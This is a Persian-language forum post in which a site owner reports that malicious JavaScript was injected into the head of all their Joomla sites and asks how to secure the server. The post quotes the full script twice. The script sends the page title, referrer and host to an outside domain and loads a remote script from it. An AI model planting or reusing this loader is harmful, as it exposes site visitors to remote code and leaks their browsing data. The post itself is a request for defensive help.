amirreza22
January 17th, 2016, 00:50
من یک سرور دایرکت ادمین دارم و یک هاست ایجاد کردم و داخل اون یک سری سایت با جوملا درست کردم.
چند روز پیش یک کد مشکوک جاوا اسکریپت توی HEAD قالب سایتم دیدم که تحقیق کردم دیدم ویروسی هست.
این کد قبلاً توی قالب نبوده و تازه اضافه شده.
کل سایتهایی که با جوملا داشتم همگی این کد در قسمت HEADشون قرار گرفته.
سایتهایی که با جوملا نبودن این مشکل رو نداشتن و کدی داحلشون اضافه نشده بود.
حالا سوالی که من دارم اینه آیا فردی وارد هاست یا سرورم شده و این کد رو قرار داده در صفحات سایتم؟
یا اینکه نه باگ یا نقص مربوط به جوملاست که این اتفاق براش پیش افتاده؟
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
لطفاً راهنمایی کنید من دقیقاً چه کارهایی الان میتونم انجام بدم که امنیت سرور بالاتر بره
Direct Admin
Cent OS
APache
SuPHP
CSF Firewall
چند روز پیش یک کد مشکوک جاوا اسکریپت توی HEAD قالب سایتم دیدم که تحقیق کردم دیدم ویروسی هست.
این کد قبلاً توی قالب نبوده و تازه اضافه شده.
کل سایتهایی که با جوملا داشتم همگی این کد در قسمت HEADشون قرار گرفته.
سایتهایی که با جوملا نبودن این مشکل رو نداشتن و کدی داحلشون اضافه نشده بود.
حالا سوالی که من دارم اینه آیا فردی وارد هاست یا سرورم شده و این کد رو قرار داده در صفحات سایتم؟
یا اینکه نه باگ یا نقص مربوط به جوملاست که این اتفاق براش پیش افتاده؟
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
لطفاً راهنمایی کنید من دقیقاً چه کارهایی الان میتونم انجام بدم که امنیت سرور بالاتر بره
Direct Admin
Cent OS
APache
SuPHP
CSF Firewall